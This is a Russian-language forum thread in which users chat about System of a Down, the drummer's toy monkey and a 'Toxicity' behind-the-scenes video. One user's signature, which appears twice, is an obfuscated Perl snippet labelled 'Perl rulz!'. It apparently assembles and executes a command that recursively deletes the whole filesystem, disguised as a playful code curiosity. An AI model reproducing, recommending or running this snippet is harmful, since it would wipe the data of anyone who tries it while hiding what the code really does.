Ghostbuster
я честно говорю, не совсем вникаю что за обезьянка, а то бы дал _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
ALuserX
ну игрушечная обезьяна, которую он с собой таскает повсюду..
в видео о том, как записывался toxicity он ею перед камерой тряс. _________________ ?Знаешь, будет очень славно?
А где можна посмотреть видео как токсисити снималось? _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Морали в этой басне нету,
купил видак - купи касету!
ALuserX
ну игрушечная обезьяна, которую он с собой таскает повсюду..
в видео о том, как записывался toxicity он ею перед камерой тряс.
Вот мне стало интересно, не видал я такого видео. _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
на ютюбе полная версия в восемь с чем-то минут названа так
System Of A Down - Toxicity Behind The Scene ( full ) _________________ ?Знаешь, будет очень славно?
Там в том видео гдет на 5 минути видно толстого заросшего дядю, ну я подумал чё эт Дарон, а потом вспомнил чё эт видео снимали до метаморфозы Дарона _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Я помню было какое-то видео,где Джон настаивал на поцелуе его обезьянки в жопу.А ещё у Металлики барабанщик вешает обезьянку на концертах и вообще,мне кажется,что не только он. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Талисман барабаншиков - обезьянка, наверное _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Я тоже что-то такое подумал. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Чт Ноя 20, 2008 1:51 am Заголовок сообщения:
типа ванька случайно в кадр попал )) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!